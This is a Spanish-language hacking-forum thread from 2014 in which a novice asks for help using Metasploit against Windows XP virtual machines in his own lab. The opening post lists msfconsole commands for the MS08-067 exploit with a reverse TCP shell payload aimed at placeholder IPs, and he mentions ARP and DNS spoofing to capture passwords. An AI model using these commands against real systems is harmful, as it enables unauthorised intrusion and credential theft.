elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Metasploit
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Metasploit  (Leído 12,721 veces)
n3n3

Desconectado Desconectado

Mensajes: 27


¡Soy n3n3 y tu no!


Ver Perfil WWW
Metasploit
« en: 24 Enero 2014, 19:26 pm »

Hola muye buenas tardes. :D
Espero puedan ayudarme, ya que me concidero novato y me gusta mucho aprender.

Tengo en una maquina virtual montado Kali Linux y en otra Backtrack 5 r3 y en la tercera tengo Win Xp y e estado intentando hacerme de una windows shell dentro de la que tiene WinXP desde kali y backtrack, pero hasta ahora solo e logrado fracasar, no me e rendido, pero si me pudieran guiar, explicar o proporcionar algun otro metedo.
lo e estado intentando con el PAYLOAD desde MSFCONSOLE, tambien con ARMITAGE e usado tambien estos comandos que les escribire tal cual los use:
 :huh:
use exploit/windows/smb/ms08_067_netapi
set RHOST 000.000.000.000  <-----Ip a atacar
set payload windows/shell/reverse_tcp
set LHOST 000.000.000.000   <----Ip atacante
exploit

Pero tampoco dan resultado, simplemente no carga el exploit, o me dice algo del packete en ingles, o (no-targget), pero siempre ingreso la ip de la victima que en este caso es mi otra maquina virtual, las tres maquinas las tengo en modo britged, (adaptador puente)desde VBox


Ayudame por favor
*****************************************************************************
En línea

“Todo lo que somos es el resultado de lo que hemos pensado; está fundado en nuestros pensamientos y está hecho de nuestros pensamientos.”
MCKSys Argentina
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.471


Diviértete crackeando, que para eso estamos!


Ver Perfil
Re: Metasploit
« Respuesta #1 en: 24 Enero 2014, 19:31 pm »

Una pregunta: el XP es vulnerable? Osea, está actualizado o no? Si está patcheado, no funcionará el exploit...  :P

Saludos!
En línea

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."

n3n3

Desconectado Desconectado

Mensajes: 27


¡Soy n3n3 y tu no!


Ver Perfil WWW
Re: Metasploit
« Respuesta #2 en: 24 Enero 2014, 19:50 pm »

Amigo tiene apenas 1 dia de que lo tengo instalado, pero de ser asi lo reinstalo, es un XP SP 3
Pero mi moden tengo abiertos los puertos, y yo creo que debe de haber alguna manera para poder penetrar en la maquina, no importa si esta actualizado, por eso mismo posteo mi duda, haber si alguien conoce alguna forma de hackear ese Xp sp3 o windows 7 desde backtrack 5 o kali linux desde metasploit o alguna otra manera, la que sea no importa solo quiero aprender alguna que sea exitosa
 :-(
En línea

“Todo lo que somos es el resultado de lo que hemos pensado; está fundado en nuestros pensamientos y está hecho de nuestros pensamientos.”
noopynoob

Desconectado Desconectado

Mensajes: 104



Ver Perfil
Re: Metasploit
« Respuesta #3 en: 24 Enero 2014, 19:51 pm »

que yo sepa no se puede desde una maquina virtual ya que la IP no esta dentro del rango, hay que tener dos maquinas para realizar el ataque
En línea

n3n3

Desconectado Desconectado

Mensajes: 27


¡Soy n3n3 y tu no!


Ver Perfil WWW
Re: Metasploit
« Respuesta #4 en: 24 Enero 2014, 19:55 pm »

Pues ya realize desde una de mis maquinas con backtrack 5 hice un ataque DNS Spoffing y envenenamiento de ARP para obtener claves de mi maquina tangible, osea la principal, y si me funciono, pero agradeceria si alguien me hace saber algun metodo que pueda yo utlizar, y pues escanear bulnerabilidades con nmap desde backtrack, y que ataques conocen para una red local???????????
 :-(

Porfavor algun ataque para una red local, que yo pueda probar en mi pequeña red? :huh:
En línea

“Todo lo que somos es el resultado de lo que hemos pensado; está fundado en nuestros pensamientos y está hecho de nuestros pensamientos.”
noopynoob

Desconectado Desconectado

Mensajes: 104



Ver Perfil
Re: Metasploit
« Respuesta #5 en: 24 Enero 2014, 20:04 pm »

Pues ya realize desde una de mis maquinas con backtrack 5 hice un ataque DNS Spoffing y envenenamiento de ARP para obtener claves de mi maquina tangible, osea la principal, y si me funciono, pero agradeceria si alguien me hace saber algun metodo que pueda yo utlizar, y pues escanear bulnerabilidades con nmap desde backtrack, y que ataques conocen para una red local???????????
 :-(

Porfavor algun ataque para una red local, que yo pueda probar en mi pequeña red? :huh:

pues se puede hacer el ARP spoofing desde una maquina virtual pero solo afectara a la maquina en donde esta corriendo la maquina virtual y no en las demás, una vez intente penetrar win8 desde backtrack que corría en una maquina virtual y no me funciono entonces quite la mv e inicie backtrack en una laptop y el ataque si funciono.
En línea

n3n3

Desconectado Desconectado

Mensajes: 27


¡Soy n3n3 y tu no!


Ver Perfil WWW
Re: Metasploit
« Respuesta #6 en: 24 Enero 2014, 20:15 pm »

Ok intentare los ataques desde una PC fisica, y posteriormente voy a postear los resultados obtenidos, muchas gracias.
En línea

“Todo lo que somos es el resultado de lo que hemos pensado; está fundado en nuestros pensamientos y está hecho de nuestros pensamientos.”
engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: Metasploit
« Respuesta #7 en: 25 Enero 2014, 04:13 am »

que maquina virtual usas? porque depende de ella puedes configurar las ip y todo eso para simular una red real :P
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
n3n3

Desconectado Desconectado

Mensajes: 27


¡Soy n3n3 y tu no!


Ver Perfil WWW
Re: Metasploit
« Respuesta #8 en: 26 Enero 2014, 21:06 pm »

Uso Virtual Box, lo que pasa que en YouTube hay videos donde realizan ataques con armitage, y tambien manualmente con el Metasploid, haciendose de una shell windows, en estas mismas maquinas virtuales, y hasta ahora no me a funcionado ni en NAT ni en Bridgeb.


Ayuendeme de cual es el problema, hago escaneo con nmap y me aparecen mis maquinas fisicas en el kali virtual, pero la otra PC con WinXp que es virtual tambien, no me aparece.

Tambien cuando ataco la mia que tiene Win7 Ultimate, me sale el siguiente error desde metasploit, me imagino que es por que no es vulnerable a este tipo de ataque, ustedes que opinan sobre este otro tema...
En línea

“Todo lo que somos es el resultado de lo que hemos pensado; está fundado en nuestros pensamientos y está hecho de nuestros pensamientos.”
Owl-City

Desconectado Desconectado

Mensajes: 44

Ésta es mi respuesta, ¿Y tu respuesta?


Ver Perfil
Re: Metasploit
« Respuesta #9 en: 27 Enero 2014, 23:15 pm »

Hola,

Amigo, te compadezco, no soy un profesional, no quiero ser necio, pero específicamente que exploit usaste, no me des el proceso solo el nombre, porque si es un payload, tienes que es pecificar.
Me explico:
Es de x86 o x64.
Se que usaste Cain y Abel, para hacer tus ataques de contraseña y envenenar la red. Y sí, es automático, por eso te dio en el blanco. Lo mejor que puedes hacer es programarte tu propio exploit en una terminal  ;)
« Última modificación: 27 Enero 2014, 23:32 pm por Owl-City » En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Metasploit] Usar Keylogger del Metasploit
Hacking
Shell Root 5 17,462 Último mensaje 23 Abril 2011, 20:59 pm
por Edu
metasploit
Bugs y Exploits
rickdeckard 0 2,664 Último mensaje 27 Febrero 2012, 00:39 am
por rickdeckard
Metasploit + Uso
Bugs y Exploits
MeCraniDOS 2 4,653 Último mensaje 5 Noviembre 2012, 00:26 am
por MeCraniDOS
Metasploit
Hacking
Stakewinner00 0 2,165 Último mensaje 2 Febrero 2013, 20:13 pm
por Stakewinner00
Metasploit en NAT
Hacking
raskan 3 3,144 Último mensaje 25 Marzo 2013, 18:37 pm
por int_0x40
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines